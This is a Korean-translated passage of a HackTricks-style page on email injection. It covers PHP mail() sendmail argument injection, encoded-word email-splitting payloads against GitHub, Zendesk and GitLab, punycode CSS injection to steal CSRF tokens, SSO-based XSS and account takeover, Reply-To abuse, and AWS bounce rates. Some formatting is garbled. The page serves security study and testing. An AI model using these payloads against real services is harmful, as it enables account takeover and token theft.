# The function has the following definition:php--rfmailFunction [ <internal:standard>functionmail]{-Parameters [5] {Parameter#0 [ <required> $to ]Parameter#1 [ <required> $subject ]Parameter#2 [ <required> $message ]Parameter#3 [ <optional> $additional_headers ]Parameter#4 [ <optional> $additional_parameters ]}}
5번째 매개변수 ($additional_parameters)
이 섹션은 공격자가 이 매개변수를 제어한다고 가정할 때 이를 악용하는 방법에 기반할 것입니다.
이 매개변수는 PHP가 바이너리 sendmail을 호출하는 데 사용할 명령줄에 추가될 것입니다. 그러나 escapeshellcmd($additional_parameters) 함수로 세척될 것입니다.
이 경우 공격자는 sendmail에 대한 추가 매개변수를 주입할 수 있습니다.
/usr/sbin/sendmail 구현의 차이점
sendmail 인터페이스는 시스템에 설치된 MTA 이메일 소프트웨어(Sendmail, Postfix, Exim 등)에 의해 제공됩니다. 기본 기능(예: -t -i -f 매개변수)은 호환성 이유로 같은 상태를 유지하지만, 다른 기능과 매개변수는 설치된 MTA에 따라 크게 다릅니다.
PHP 256 오버플로우: PHP chr 함수는 문자가 양수가 될 때까지 256을 계속 추가한 후 %256 연산을 수행합니다.
String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @
이 트릭의 목표는 RCPT TO:<"collab@psres.net>collab"@example.com>와 같은 주입으로 끝나는 것입니다.
이는 확인 이메일을 예상된 이메일 주소와 다른 이메일 주소로 보내게 하여 이메일 이름 안에 다른 이메일 주소를 삽입하고 이메일을 보낼 때 구문을 깨뜨리게 됩니다.
다양한 인코딩:
# Format=?utf-8?q?=41=42=43?=hi@example.com-->ABChi@example.com# =? -> Start of encode# utf-8 -> encoding used# ? -> separator# q -> type of encoding# ? -> separator# =41=42=43 -> Hex encoded data# ?= end of encoding# Other encodings, same example:# iso-8859-1=?iso-8859-1?q?=61=62=63?=hi@example.com# utf-8=?utf-8?q?=61=62=63?=hi@example.com# utf-7=?utf-7?q?<utf-7 encodedstring>?=hi@example.com# q encoding + utf-7=?utf-7?q?&=41<utf-7 encodedstringwithoutinitial A>?=hi@example.com# base64=?utf-8?b?QUJD?=hi@example.com# bas64 + utf-7=?utf-7?q?<utf-7 encodedstringinbase64>?=hi@example.com#punycodex@xn--svg/-9x6→x@<svg/
Payloads:* Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`* 인코딩된 `@`는 =40, 인코딩된 `>`는 `=3e`, null은 `=00`입니다. * `collab@psres.net`로 인증 이메일이 전송됩니다.* Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`* 이전과 같은 트릭이지만, 시작 부분에 일반 따옴표를 추가하고 인코딩된 따옴표 `=22`를 인코딩된 `@` 앞에 추가한 후, 다음 이메일 앞에 따옴표를 시작하고 닫아 Zendesk 내부에서 사용되는 구문을 수정합니다.
* `collab@psres.net`로 인증 이메일이 전송됩니다.* Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`* 주소를 구분하기 위해 언더스코어를 공백으로 사용합니다.* `collab@psres.net`로 인증 이메일이 전송됩니다.* Punycode: Punycode를 사용하여 Joomla에 `<style` 태그를 주입하고 CSS 유출을 통해 CSRF 토큰을 훔치는 데 악용할 수 있었습니다.#### Tooling* 이러한 조합을 퍼징하여 이메일 형식을 공격하려는 **Burp Suite Turbo Intruder 스크립트**가 있습니다. 스크립트에는 이미 잠재적으로 작동하는 조합이 포함되어 있습니다.* [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100)를 사용하여 이메일 분할 공격을 생성하는 것도 가능합니다.### Other vulns![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)## Third party SSO### XSS**github** 또는 **salesforce**와 같은 일부 서비스는 **XSS 페이로드가 포함된 이메일 주소를 생성할 수 있도록** 허용합니다. 이러한 제공자를 사용하여 다른 서비스에 로그인할 수 있고, 이 서비스가 이메일을 **올바르게 정리하지 않는다면**, **XSS**를 유발할 수 있습니다.
### Account-Takeover**SSO 서비스**가 **주어진 이메일 주소를 확인하지 않고 계정을 생성할 수 있도록** 허용하는 경우(예: **salesforce**), 해당 계정을 사용하여 **salesforce를 신뢰하는 다른 서비스에 로그인할 수 있다면**, 모든 계정에 접근할 수 있습니다.\
&#xNAN;_Note that salesforce는 주어진 이메일이 확인되었는지 여부를 표시하지만, 애플리케이션은 이 정보를 고려해야 합니다._## Reply-To_**From: company.com**_을 사용하여 이메일을 보낼 수 있으며, _**Replay-To: attacker.com**_을 사용하면, 이메일이 **내부 주소**에서 **보낸** 경우 **자동 회신**이 전송될 수 있으며, **공격자**가 해당 **응답**을 **받을 수** 있습니다.
## Hard Bounce RateAWS와 같은 특정 서비스는 **Hard Bounce Rate**로 알려진 임계값을 구현하며, 일반적으로 10%로 설정됩니다. 이는 이메일 전송 서비스에 특히 중요한 지표입니다. 이 비율을 초과하면 AWS의 이메일 서비스와 같은 서비스가 중단되거나 차단될 수 있습니다.
**하드 바운스**는 수신자의 주소가 유효하지 않거나 존재하지 않아 발신자에게 반환된 **이메일**을 의미합니다. 이는 **이메일**이 존재하지 않는 주소로 전송되거나, 실제가 아닌 도메인으로 전송되거나, 수신자 서버가 **이메일** 수신을 거부하는 등의 다양한 이유로 발생할 수 있습니다.
AWS의 맥락에서 1000개의 이메일을 보내고 그 중 100개가 하드 바운스(유효하지 않은 주소나 도메인과 같은 이유로)되는 경우, 이는 10%의 하드 바운스 비율을 의미합니다. 이 비율에 도달하거나 초과하면 AWS SES(간단한 이메일 서비스)가 이메일 전송 기능을 차단하거나 중단할 수 있습니다.
중단 없는 이메일 서비스를 보장하고 발신자 평판을 유지하기 위해 낮은 하드 바운스 비율을 유지하는 것이 중요합니다. 메일링 리스트의 이메일 주소 품질을 모니터링하고 관리하는 것은 이를 달성하는 데 크게 도움이 될 수 있습니다.
자세한 정보는 AWS의 하드 바운스 및 불만 처리에 대한 공식 문서를 참조할 수 있습니다 [AWS SES Bounce Handling](https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#bounce-types).
## References* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
* [https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)<div data-gb-custom-block data-tag="hint" data-style='success'>Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details><summary>Support HackTricks</summary>* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details></div><figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>\Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:<div data-gb-custom-block data-tag="embed" data-url='https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections'></div>